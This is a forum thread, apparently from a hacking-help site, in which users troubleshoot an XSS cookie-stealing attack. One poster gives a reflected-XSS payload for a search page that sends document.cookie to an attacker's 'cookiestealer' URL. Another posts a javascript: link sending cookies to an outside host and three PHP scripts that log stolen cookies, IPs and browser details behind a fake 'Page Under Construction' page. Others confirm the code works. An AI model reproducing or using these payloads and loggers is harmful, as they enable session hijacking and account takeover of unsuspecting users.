0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
The script that you are trying is wrong. Try this:

http:// w w w .victimsite.com/forums/search.php?query="><script>document.location="http ://yoursite.com/cookiestealer?c=" + document.cookie</script>
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
Thank you for your timely responses.

After using that code I am now getting the information and the cookie logged properly.
however the page still does not redirect.

I am using firefox 3.5.7 I don't know if that makes any difference.
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
pm me with the info..
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
turns out the issue is the host, the code works fine.
0
m93's Avatar, Join Date: Nov 2009
m93
Go4Expert Member
if i want test this script on myself what should i do? (logging in a forum or test that in firefox or ie?)
0
ginoside021's Avatar
Email Reported As Spam
Quote:
Originally Posted by indiansword View Post
pm me with the info..
can you teach me how to make this cookiestealer
0
indiansword's Avatar, Join Date: Oct 2008
Security Expert
Quote:
Originally Posted by ginoside021 View Post
can you teach me how to make this cookiestealer
Go through this entire thread. I think i have explained most of the things.
0
ginoside021's Avatar
Email Reported As Spam
Quote:
Originally Posted by indiansword View Post
Go through this entire thread. I think i have explained most of the things.
i tried to make one regarding on the tut but mine is not workin can you help me plsss

i add you in my yahoo inocentjacky is my yahoo ID plssss
0
shadowman32's Avatar, Join Date: Jun 2010
Newbie Member
i dont understand something...

for example if i put this cod as a index page

<a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+
document.cookie)">Click Me</a>

and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job

i guess i do something wrong because none of them works. below are the stealer script that i use:
1
HTML Code:
 <?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
2
HTML Code:
<?php 

function GetIP() 
{ 
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
        $ip = getenv("HTTP_CLIENT_IP"); 
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
        $ip = getenv("HTTP_X_FORWARDED_FOR"); 
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
        $ip = getenv("REMOTE_ADDR"); 
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
        $ip = $_SERVER['REMOTE_ADDR']; 
    else 
        $ip = "unknown"; 
    return($ip); 
} 

function logData() 
{ 
    $ipLog="log.txt"; 
    $cookie = $_SERVER['QUERY_STRING']; 
    $register_globals = (bool) ini_get('register_gobals'); 
    if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
    else $ip = GetIP(); 

    $rem_port = $_SERVER['REMOTE_PORT']; 
    $user_agent = $_SERVER['HTTP_USER_AGENT']; 
    $rqst_method = $_SERVER['METHOD']; 
    $rem_host = $_SERVER['REMOTE_HOST']; 
    $referer = $_SERVER['HTTP_REFERER']; 
    $date=date ("l dS of F Y h:i:s A"); 
    $log=fopen("$ipLog", "a+"); 

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>"); 
    else 
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n"); 
    fclose($log); 
} 

logData();

echo '<b>Page Under Construction</b>'

?>
3
HTML Code:
<?php
$cookie = $_GET['c'];
$ip = getenv (‘REMOTE_ADDR’);
$date=date(“j F, Y, g:i a”);;
$referer=getenv (‘HTTP_REFERER’);
$fp = fopen(‘cookies.html’, ‘a’);
fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’);
fclose($fp);
header (“Location:TechMafias”);
?>
Please help me...my account on a web site was stolen and i want to get it back.
0
Toddie's Avatar, Join Date: Jan 2010
Contributor
Quote:
Originally Posted by shadowman32 View Post

i guess i do something wrong because none of them works. below are the stealer script that i use:
try using a different web host.